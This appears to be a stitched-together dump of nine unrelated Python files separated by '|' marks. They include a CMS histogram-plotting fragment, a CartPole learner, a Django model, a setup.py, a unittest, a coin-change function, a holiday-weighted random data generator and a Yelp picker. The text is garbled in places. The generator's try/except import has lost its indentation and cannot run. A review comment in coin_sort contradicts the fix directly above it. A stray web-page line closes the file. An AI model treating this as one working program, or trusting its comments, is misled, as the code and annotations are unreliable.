#print math.sqrt(systSquareDo[0]), htotalmc.GetBinContent (1), htotalmc.Integral(), ylratio[0]
tgrMC.SetLineColor(12)
tgrMC.SetFillColor(12)
tgrMC.SetLineWidth(2)
tgrMC.SetFillStyle(3004)
tgrMCRatio.SetLineColor(12)
tgrMCRatio.SetFillColor(12)
tgrMCRatio.SetLineWidth(2)
tgrMCRatio.SetFillStyle(3004)
for iBin in range(0, len(x)) :
    tgrMC.SetPoint (iBin, x[iBin], y[iBin])
    tgrMC.SetPointError(iBin, xl[iBin], xh[iBin], yl[iBin], yh[iBin])
    tgrMCRatio.SetPoint (iBin, x[iBin], yr[iBin])
    tgrMCRatio.SetPointError(iBin, xl[iBin], xh[iBin], ylratio[iBin], yhratio[iBin])
# NOTE(review): `normalize` comes from sys.argv, so it is always a string and
# never None -- the `normalize != None` branches always take the normalized
# path; confirm whether an unset/"" sentinel was intended.
if normalize != None:
    hl.Scale(1./htotalmc.Integral())
    hc.Scale(1./htotalmc.Integral())
    hb.Scale(1./htotalmc.Integral())
    htotalmc.Scale(1./htotalmc.Integral())
# Stacked MC (light/charm/bottom) plus the two data histograms.
stack = THStack()
stack.Add(hl)
stack.Add(hc)
stack.Add(hb)
hdata=datafile.Get(var+"__"+ptbin+""+selection)
hdata.SetMarkerStyle(20)
hdata.SetLineWidth(2)
hdata_inverted=datafile_inverted.Get(var+"__"+ptbin+""+selection)
hdata_inverted.SetNameTitle("inverted", "inverted")
hdata_inverted.SetMarkerStyle(21)
hdata_inverted.SetLineWidth(2)
legend=TLegend(0.7, 0.7, 0.9, 0.9)
legend.SetBorderSize(0)
legend.SetFillColor(0)
legend.AddEntry(hb, "b jets", "f")
legend.AddEntry(hc, "c jets", "f")
legend.AddEntry(hl, "light jets", "f")
legend.AddEntry(hdata, "data", "lp")
legend.AddEntry(hdata_inverted, "data (MC Calib)", "lp")
if normalize != None:
    hdata.Scale(1./hdata.Integral())
    hdata_inverted.Scale(1./hdata_inverted.Integral())
# Data/MC ratio histograms for the lower pad.
hratio=hdata.Clone()
hratio.Divide(htotalmc)
hratio_inverted=hdata_inverted.Clone()
hratio_inverted.Divide(htotalmc)
# Upper pad: stacked MC with systematic band plus data points.
c = TCanvas()
pad1 = TPad("pad1", "pad1", 0, 1-0.72, 1, 1)
pad1.Draw()
pad1.cd()
stack.Draw("HIST")
tgrMC.Draw("2")
hdata.Draw("sames")
hdata_inverted.Draw("sames")
legend.Draw("same")
CMS_lumi.CMS_lumi(pad1, 4, 11)
pad1.RedrawAxis()
c.cd()
# Lower pad: data/MC ratio with the relative systematic band.
pad2 = TPad("pad2", "pad2",0,0,1,1-0.72)
pad2.SetTopMargin(0.000)
pad2.SetBottomMargin(0.392)
pad2.Draw()
pad2.cd()
oneLine = TLine(hratio.GetXaxis().GetXmin(), 1, hratio.GetXaxis().GetXmax(), 1);
oneLine.SetLineStyle(3)
oneLine.SetLineWidth(3)
hratio.GetXaxis().SetLabelSize(0.15)
hratio.GetYaxis().SetLabelSize(0.15)
hratio.GetYaxis().SetRangeUser(0., 2.)
hratio.GetYaxis().SetNdivisions(508)
hratio.Draw()
hratio_inverted.Draw("same")
tgrMCRatio.Draw("2")
#oneLine.Draw("same")
pad2.SetGridy()
pad2.RedrawAxis()
c.SaveAs("pics/"+var+"__"+ptbin+""+selection+".png")
# Re-draw the upper pad in log scale and save a second copy.
pad1.cd()
pad1.SetLogy()
c.SaveAs("pics/log_"+var+"__"+ptbin+""+selection+".png")
#a=raw_input("ciao")
|
# Inspired by https://ferdinand-muetsch.de/cartpole-with-qlearning-first-experiences-with-openai-gym.html
# & https://medium.com/@tuzzer/cart-pole-balancing-with-q-learning-b54c6068d947&
import gym
import numpy as np
import math
from collections import deque
class QLearningCartPoleSolver():
    """Tabular TD solver for Gym's CartPole-v0 over a discretized state space.

    NOTE(review): update_q bootstraps on the epsilon-greedily chosen
    `next_action` (SARSA-style), not on max_a Q(s', a) as in Q-learning --
    confirm which algorithm is intended.
    """
    def __init__(self):
        self.env = gym.make('CartPole-v0')
        self.n_episodes = 10000  # training budget
        self.win_score = 195  # CartPole-v0 "solved" threshold
        self.min_learning_rate = 0.1
        self.min_exploration_rate = 0.1
        self.discount_factor = 1.0
        self.buckets = (1, 1, 6, 12,) # down-scaling feature space to discrete range
        self.q_table = np.zeros(self.buckets + (self.env.action_space.n,))
    def discretize(self, obs):
        # Map the continuous observation to bucket indices, clamping the
        # velocity terms to hand-picked bounds (+-0.5 and +-50 degrees).
        upper_bounds = [self.env.observation_space.high[0], 0.5, self.env.observation_space.high[2], math.radians(50)]
        lower_bounds = [self.env.observation_space.low[0], -0.5, self.env.observation_space.low[2], -math.radians(50)]
        ratios = [(obs[i] + abs(lower_bounds[i])) / (upper_bounds[i] - lower_bounds[i]) for i in range(len(obs))]
        new_obs = [int(round((self.buckets[i] - 1) * ratios[i])) for i in range(len(obs))]
        new_obs = [min(self.buckets[i] - 1, max(0, new_obs[i])) for i in range(len(obs))]
        return tuple(new_obs)
    def choose_action(self, state, exploration_rate):
        # Epsilon-greedy action selection.
        return self.env.action_space.sample() if (np.random.random() <= exploration_rate) else np.argmax(self.q_table[state])
    def update_q(self, old_state, action, reward, new_state, next_action, learning_rate):
        # TD update bootstrapped on the action actually chosen next.
        self.q_table[old_state][action] += learning_rate * (reward + self.discount_factor * self.q_table[new_state][next_action] - self.q_table[old_state][action])
    def get_exploration_rate(self, t):
        # Log-decaying epsilon, floored at min_exploration_rate.
        return max(self.min_exploration_rate, min(1, 1.0 - math.log10((t + 1) / 25)))
    def get_learning_rate(self, t):
        # Log-decaying alpha, floored at min_learning_rate.
        return max(self.min_learning_rate, min(1.0, 1.0 - math.log10((t + 1) / 25)))
    def run(self):
        """Train until the 100-episode mean score reaches win_score.

        Returns the number of trials needed, or the final episode index
        when the environment was never solved.
        """
        scores = deque(maxlen=100)
        print(self.env.observation_space.shape)
        for episode in range(self.n_episodes):
            current_state = self.discretize(self.env.reset())
            learning_rate = self.get_learning_rate(episode)
            exploration_rate = self.get_exploration_rate(episode)
            done = False
            score = 0
            while not done:
                action = self.choose_action(current_state, exploration_rate)
                obs, reward, done, _ = self.env.step(action)
                new_state = self.discretize(obs)
                next_action = self.choose_action(new_state, self.get_exploration_rate(episode+1))
                self.update_q(current_state, action, reward, new_state, next_action, learning_rate)
                current_state = new_state
                score += reward
            # Printout of results
            scores.append(score)
            mean_score = np.mean(scores)
            if mean_score >= self.win_score and episode >= 100:
                print('Ran {} episodes. Solved after {} trials ✔'.format(episode, episode - 100))
                return episode - 100
            if episode % 100 == 0:
                print('[Episode {}] - Mean survival time over last 100 episodes was {} ticks.'.format(episode, mean_score))
        print('Did not solve after {} episodes 😞'.format(episode))
        return episode
if __name__ == "__main__":
    # Train a fresh solver when run as a script.
    QLearningCartPoleSolver().run()
from django.db import models
class Repository(models.Model):
    """A repository record, uniquely identified by its (owner, repo) pair."""
    owner = models.CharField(max_length=100)
    repo = models.CharField(max_length=100)
    # BUG FIX: default=None on a non-nullable DateTimeField makes any save
    # without an explicit date fail at the database layer; allow NULLs so the
    # declared default is actually storable.
    date = models.DateTimeField(default=None, null=True)

    class Meta:
        unique_together = (('owner', 'repo'),)
|
from sensor_adapters import Sensor
from sensor_libs.VirtualSensor import *
class VirtualHumiditySensor(Sensor.Sensor):
    """Sensor adapter that reads humidity from a simulated (virtual) sensor."""

    @classmethod
    def get_data(cls):
        """Return one humidity reading from a fresh VirtualSensor instance."""
        # BUG FIX (idiom): the first parameter of a @classmethod receives the
        # class object and is conventionally named `cls`, not `self`.
        sensor = VirtualSensor()
        return sensor.read_humidity()
|
from setuptools import setup
from io import open
import tomlkit
def _get_version():
    """Read the package version from pyproject.toml's [project] table."""
    with open('pyproject.toml') as pyproject:
        parsed = tomlkit.parse(pyproject.read())
    return parsed['project']['version']
# The long description comes straight from the README so PyPI renders it.
with open('README.md', 'r', encoding='utf-8') as f:
    readme = f.read()

setup(
    name='hello_python_cli',
    version=_get_version(),
    description='Simple python hello cli program',
    long_description=readme,
    long_description_content_type='text/markdown',
    author='Mike Kinney',
    author_email='mike.kinney@gmail.com',
    packages=['hello_module'],
    # BUG FIX: install_requires must be a list of requirement strings; the
    # original wrapped both names in a single tuple, which setuptools does
    # not accept as a requirement specifier.
    install_requires=['docopt', 'tomlkit'],
    scripts=['hello'],
)
|
#!/usr/bin/env python
import unittest
from chirp.common import timestamp
from chirp.library import constants
from chirp.library import ufid
class UFIDTest(unittest.TestCase):
    """Round-trip tests for building, tagging and parsing UFIDs."""

    def test_basic(self):
        vol = 11
        ts_human = "20090102-030405"
        ts = timestamp.parse_human_readable(ts_human)
        fp = "1234" * 10

        # The UFID prefix should contain the volume and timestamp info.
        self.assertEqual("vol0b/%s/" % ts_human,  # 0b = 11
                         ufid.ufid_prefix(vol, ts))

        # The UFID should equal the UFID prefix + the fingerprint.
        built = ufid.ufid(vol, ts, fp)
        self.assertEqual(ufid.ufid_prefix(vol, ts) + fp, built)

        # We should be able to make a tag too.
        tag = ufid.ufid_tag(vol, ts, fp)
        self.assertEqual("UFID", tag.FrameID)
        self.assertEqual(constants.UFID_OWNER_IDENTIFIER, tag.owner)
        self.assertEqual(built, tag.data)

        # Parsing the UFID must give back exactly what went in.
        parsed_vol, parsed_ts, parsed_fp = ufid.parse(built)
        self.assertEqual(vol, parsed_vol)
        self.assertEqual(ts, parsed_ts)
        self.assertEqual(fp, parsed_fp)

        # Malformed UFIDs must raise ValueError.
        for bad in ("bad",
                    "vol01/20091399-666666/" + "1" * 40,
                    "vol01/20991001-123456" + "1" * 40):
            self.assertRaises(ValueError, ufid.parse, bad)
# Allow running this test module directly with `python <file>`.
if __name__ == "__main__":
    unittest.main()
|
def coin_sort(amt: float) -> str:
    """Break a dollar amount into coin counts and return them as a JSON string.

    Whole dollars become 'silver-dollar's; the remaining cents are greedily
    split into half-dollars, quarters, dimes, nickels and pennies.
    """
    # BUG FIX: json was only imported under __main__, so both the original
    # `-> json` annotation and the json.dumps call raised NameError whenever
    # the module was imported.
    import json
    # Denominations, consumed largest-first via pop() below.
    denom = [1, 5, 10, 25, 50]
    denom_names = {50: 'half-dollar', 25: 'quarter', 10: 'dime',
                   5: 'nickel', 1: 'penny'}
    # BUG FIX: work in integer cents via round(); plain int() truncates float
    # noise (e.g. 1.41 * 100 == 140.999..., which int() turned into 140 cents).
    num, rem = divmod(int(round(amt * 100)), 100)
    result = {'silver-dollar': num}
    while denom:
        coin = denom.pop()
        num, rem = divmod(rem, coin)
        result[denom_names[coin]] = num
    return json.dumps(result, indent=4)
if __name__ == '__main__':
    # NOTE(review): importing json only here — after coin_sort is defined —
    # leaves the module-level `-> json` annotation and the json.dumps call
    # inside coin_sort unresolved when the module is imported; the import
    # belongs at module scope.
    import json
|
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 26 10:10:21 2018
@author: Administrator
"""
from datetime import datetime,timedelta,date
import holidays
import pandas as pd
import numpy as np
import json
try:
from itertools import izip as zip
except ImportError: # will be 3.x series
pass
#import date
# Base calendar of Indian public holidays; holiday_check() below appends
# extra holiday dates read from the input JSON to it.
i_holidays = holidays.India()
holiday_update = {}
# NOTE(review): listt and hd appear to be unused in this file.
listt = []
hd = []
def load_json(path):
    """Load and return the JSON document at *path*, or None on failure.

    Kept best-effort like the original, but catches only the errors that
    opening/parsing can actually raise instead of a bare except.
    """
    try:
        with open(path) as data_file:
            return json.load(data_file)
    except (OSError, ValueError):  # ValueError covers json.JSONDecodeError
        print("Json File Not Loaded ")
def date_id(data):
    """Cross-join the SKU ids with the configured date range.

    Scans data['Header']: the entry typed 'SKUID' supplies the id values,
    the entry typed 'date' supplies start/end/date_format.  Returns
    (raw ndarray, id column name, date column name, DataFrame, all header
    names).

    NOTE(review): assumes both a 'SKUID' and a 'date' header exist —
    otherwise v/name1/name2 are unbound and the tail of the function raises.
    """
    dates = []
    headers = []
    for i in data['Header']:
        n = i.get('name')
        t = i.get('type')
        headers.append(n)
        if t == 'SKUID':
            v = i.get('values')
            name1 = n
        if t == 'date':
            s = i.get('start')
            e = i.get('end')
            frmt = i.get('date_format')
            name2 = n
            daterange = pd.date_range(s, e)
            # NOTE(review): this inner loop reuses the outer loop variable `i`.
            for i in daterange:
                dates.append(i.strftime(frmt))
    x = np.array(v)
    y = np.array(dates)
    # Cartesian product: every SKU repeated for every date.
    data1 = np.transpose([np.tile(x, len(y)), np.repeat(y, len(x))])
    product = pd.DataFrame(data=data1.tolist(), columns=[name1, name2])
    return data1, name1, name2, product, headers
def rand_data(data, l, product):
    """Fill *product* with one random column per typed header in *data*.

    'string' headers get random choices from their values, 'decimal' headers
    uniform floats in [min, max), 'integer' headers random ints in [min, max).
    Mutates and returns *product*.
    """
    for header in data['Header']:
        name = header.get('name')
        kind = header.get('type')
        # BUG FIX (idiom): the original bound the string column to a local
        # named `str`, shadowing the builtin; the if-chain is also made
        # mutually exclusive with elif.
        if kind == 'string':
            product[name] = np.random.choice(header.get('values'), l)
        elif kind == 'decimal':
            low = header.get('min')
            high = header.get('max')
            product[name] = np.random.uniform(low=int(low), high=int(high), size=l)
        elif kind == 'integer':
            # NB: numpy randint's `high` is exclusive, matching the original.
            product[name] = np.random.randint(low=header.get('min'), high=header.get('max'), size=l)
    return product
def fetch_hollist(data):
    """Build {sku: [date, holiday%, season%, weekend%]} from data['Holiday']."""
    hol = {}
    for entry in data['Holiday']:
        details = entry.get('details')  # [sku id, date string]
        hol[details[0]] = [details[1],
                           entry.get('holiday_percentage'),
                           entry.get('season_percentage'),
                           entry.get('weekends_percentage')]
    return hol
def fetch_weekdays(date, percent, oldvalue, file):
    """Return *oldvalue* bumped by *percent*% when *date* (YYYY-MM-DD string)
    falls on a weekend; otherwise return it unchanged.

    *file* is accepted for call-site compatibility but never used.
    """
    parsed = datetime.strptime(date, "%Y-%m-%d").date()
    if parsed.strftime('%A').lower() in ('saturday', 'sunday'):
        return oldvalue + (oldvalue * int(percent) / 100)
    return oldvalue
def weather_data(region, d, percent, oldvalue):
    """Return *oldvalue* bumped by *percent*% when date *d* (YYYY-MM-DD
    string) falls in a season of *region* (a 1-element sequence holding the
    region name); otherwise return *oldvalue* unchanged.

    BUG FIX: the original fell off the end of the function (returning None)
    when the region was known but the month matched no season; every path
    now returns a number.
    """
    seasons = {
        'china': {'summer': 'may,june,july', 'autumn': 'july,august,september,october', 'winter': 'november,december,january,february'},
        'africa': {'dry': 'december,january,may,june,july,august', 'rainy': 'february,march,april,september,october,november'},
        'amazon': {'summer': 'february,march,april,may,june'},
        'new zealand': {'spring': 'september,october,november', 'summer': 'december,january,february', 'autumn': 'march,april,may', 'winter': 'june,july,august'},
        'australia': {'spring': 'september,october,november', 'summer': 'december,january,february', 'autumn': 'march,april,may', 'winter': 'june,july,august'},
        'russia': {'winter': 'december,january,february', 'spring': 'march,april,may', 'summer': 'june,july,august', 'autumn': 'september,october,november'},
    }
    month = datetime.strptime(d, '%Y-%m-%d').strftime('%B').lower()
    name = np.array(region)[0]
    for months in seasons.get(name, {}).values():
        if month in months:
            return oldvalue + (oldvalue * int(percent) / 100)
    return oldvalue
def holiday_check(data):
    """Extend the module-level `i_holidays` calendar with the extra holidays
    listed under data["holiday_name"] and return it.

    NOTE(review): mutates the module-level `i_holidays` in place; the local
    `holiday_update` shadows the unused module-level global of the same name.
    """
    for h in data["holiday_name"]:
        h1 = h.get('pub_holiday')       # assumes a list of holiday names — TODO confirm
        h2 = h.get('pub_holiday_date')  # assumes a parallel list of dates — TODO confirm
        print(h1)
        print(h2)
        # Zip the parallel lists into {name: date}.
        holiday_update = {k: v for k, v in zip(h1, h2)}
        for d in holiday_update.values():
            # presumably registers each date in the `holidays` calendar —
            # verify against the holidays package API
            i_holidays.append(d)
    return i_holidays
def holilist_update(holiday_checks, datedata, percent, oldvalue):
    """Return *oldvalue* bumped by *percent*%.

    The first two parameters are accepted for call-site compatibility but
    are not used.
    """
    uplift = oldvalue * int(percent) / 100
    return oldvalue + uplift
def date_check(holiday_checks, olddate):
    """Return 1 if *olddate* (YYYY-MM-DD string) lies within +-10 days of any
    date in *holiday_checks*, else 0."""
    target = datetime.strptime(olddate, "%Y-%m-%d").date()
    window = timedelta(days=10)
    for holiday in holiday_checks:
        if holiday - window <= target <= holiday + window:
            return 1
    return 0
def seaholweek(data):
    """Apply weekend, season and holiday uplifts to the global DataFrame `r`.

    Relies on the module globals r, id, d and holiday_checks bound by the
    driver code at the bottom of this file.
    """
    # Discover which generated columns carry the season / weekend / holiday /
    # location values by matching substrings of each header's description.
    for x in data['Header']:
        h = x.get('name')
        g = x.get('description')
        if (g):
            if 'sea' in g:
                sheader = h
            if 'week' in g:
                wheader = h
            if 'hol' in g:
                hheader = h
            if 'loc' in g:
                loc = h
    # NOTE(review): sheader/wheader/hheader/loc are only bound when a matching
    # description exists; otherwise the loop below raises NameError.
    for y in data['Holiday']:
        details = y.get('details')  # [SKU id, date string]
        time = details[1]
        hper = y.get('holiday_percentage')
        seper = y.get('season_percentage')
        wper = y.get('weekends_percentage')
        # Weekend uplift for the (SKU, date) row.
        oldweek = r.loc[(r[id] == details[0]) & (r[d] == details[1]), wheader]
        nw = fetch_weekdays(time, wper, oldweek, 's.json')
        r.loc[(r[id] == details[0]) & (r[d] == time), wheader] = nw
        # Season uplift, driven by the row's location column.
        oldsea = r.loc[(r[id] == details[0]) & (r[d] == details[1]), sheader]
        print(oldsea)
        region = r.loc[(r[id] == details[0]) & (r[d] == details[1]), loc]
        neww = weather_data(region, time, seper, oldsea)
        r.loc[(r[id] == details[0]) & (r[d] == time), sheader] = neww
        print(neww)
        # Holiday uplift, applied only when the row's date is within +-10
        # days of a known holiday (see date_check).
        oldday = r.loc[(r[id] == details[0]) & (r[d] == details[1]), hheader]
        olddate = r.loc[(r[id] == details[0]) & (r[d] == details[1]), d]
        ddate = np.array(olddate)
        status = date_check(holiday_checks, ddate[0])
        if status == 1:
            r.loc[(r[id] == details[0]) & (r[d] == details[1]), hheader] = holilist_update(holiday_checks, time, hper, oldday)
def file(data):
    """Write the module-level DataFrame `r` to the CSV named by
    data["filename"]; return the filename, or None (after printing) on failure.
    """
    try:
        # BUG FIX (idiom): the original bound the filename to a local named
        # `file`, shadowing the function's own name.
        out = data.get("filename")
        r.to_csv(out, index=False)
        return out
    # BUG FIX: was a bare except, which also swallowed SystemExit and
    # KeyboardInterrupt; keep the original best-effort print otherwise.
    except Exception:
        print("enter correct file name ")
# --- Script driver: build the random dataset described by s.json, apply the
# --- weekend/season/holiday uplifts, and write the result to CSV. ---
data = load_json(r's.json')
# NOTE(review): `id` shadows the builtin; `d` is the date column name.
dataa, id, d, product, headers = date_id(data)
reg = data.get('location')
l = len(product)
r = rand_data(data, l, product)
# NOTE(review): this rebinds the imported `holidays` module name.
holidays = fetch_hollist(data)
holiday_checks = holiday_check(data)
seaholweek(data)
file(data)
"""for x in holidays.keys():
for y in data['Header']:
h=y.get('name')
g=y.get('description')
if(g):
if 'sea' in g:
header=h
oldvalue=r.loc[(r[id]==x) & (r[d]==holidays[x][0]),h]
print(r.loc[(r[id]==x) & (r[d]==holidays[x][0]),'date'],x)"""
|
from YelpApi import business_search_results
import random
#print(business_search_results())
def just_pick():
    """Return one business chosen uniformly at random from the search results."""
    options = business_search_results()
    return random.choice(options)
#print(random_pick) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.